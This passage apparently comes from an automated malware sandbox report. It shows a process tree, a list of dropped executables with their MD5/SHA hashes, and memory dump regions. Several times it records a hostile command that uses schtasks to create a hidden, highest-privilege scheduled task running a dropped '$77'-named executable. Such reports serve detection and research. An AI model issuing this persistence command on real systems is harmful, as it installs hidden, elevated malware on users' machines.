                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                              2⤵
                                                                                PID:1536
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1640
                                                                              • C:\Windows\system32\CMD.exe
                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST & exit
                                                                                2⤵
                                                                                  PID:2608
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "$77dfesf" /tr "C:\Program Files\$77fuh.exe" /RL HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2604
                                                                              • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                1⤵
                                                                                  PID:2860

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files\$77fuh.exe
  Filesize: 380KB
  MD5:      7091d715676e10c44205e6fa7f50b7bd
  SHA1:     a950398047b6b554181538d6e78ada18bfba510e
  SHA256:   23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88
  SHA512:   2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5:      32c10adfa070cac5233ba09dfd7d6568
  SHA1:     549315ddea6a09bbdf25c552d4a20183483564a1
  SHA256:   cb59c3b2085b9e3950cb64e35a1d8defd4bcc3ec5bfce3c216f7cc80f87d62bf
  SHA512:   61623834c50f3ce0daa1d9a9db15930ddb473a09ac69f5ab9f5a0a17dac4b2f45d727c7be5a9dadd6af7b66489f9c3f57b070fd8f35aa11dddc256c4290ebf20

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe
  Filesize: 227KB
  MD5:      53681862212e052e3c6b3e9ca9594428
  SHA1:     f89c700368b19d182062f673f9b51199e08c47cc
  SHA256:   2576a8b91992cead33bc30b306852a6fbaa559fff89a534537495abe76aca3a2
  SHA512:   2f9649751aeeabd4e59b7e172937518bb6867ce99eee00687243d6218edbdbc5d573a5cea36416131a3787360d215d557f91c75f480d30ce3d6bbd1152e81fa8

• memory/1736-59-0x00000000021D0000-0x00000000021D8000-memory.dmp
  Filesize: 32KB

• memory/1736-58-0x000000001B620000-0x000000001B902000-memory.dmp
  Filesize: 2.9MB

• memory/2444-47-0x000000001B6B0000-0x000000001B992000-memory.dmp
  Filesize: 2.9MB

• memory/2444-48-0x0000000001E00000-0x0000000001E08000-memory.dmp
  Filesize: 32KB

• memory/2684-51-0x0000000000180000-0x00000000001C0000-memory.dmp
  Filesize: 256KB

• memory/2848-7-0x0000000000860000-0x000000000086C000-memory.dmp
  Filesize: 48KB

• memory/2848-41-0x0000000000890000-0x000000000089C000-memory.dmp
  Filesize: 48KB

• memory/2848-14-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp
  Filesize: 9.9MB

• memory/2848-10-0x0000000000870000-0x000000000087A000-memory.dmp
  Filesize: 40KB

• memory/2848-0-0x000007FEF5493000-0x000007FEF5494000-memory.dmp
  Filesize: 4KB

• memory/2848-5-0x000007FEF5493000-0x000007FEF5494000-memory.dmp
  Filesize: 4KB

• memory/2848-3-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp
  Filesize: 9.9MB

• memory/2848-1-0x00000000008C0000-0x0000000000926000-memory.dmp
  Filesize: 408KB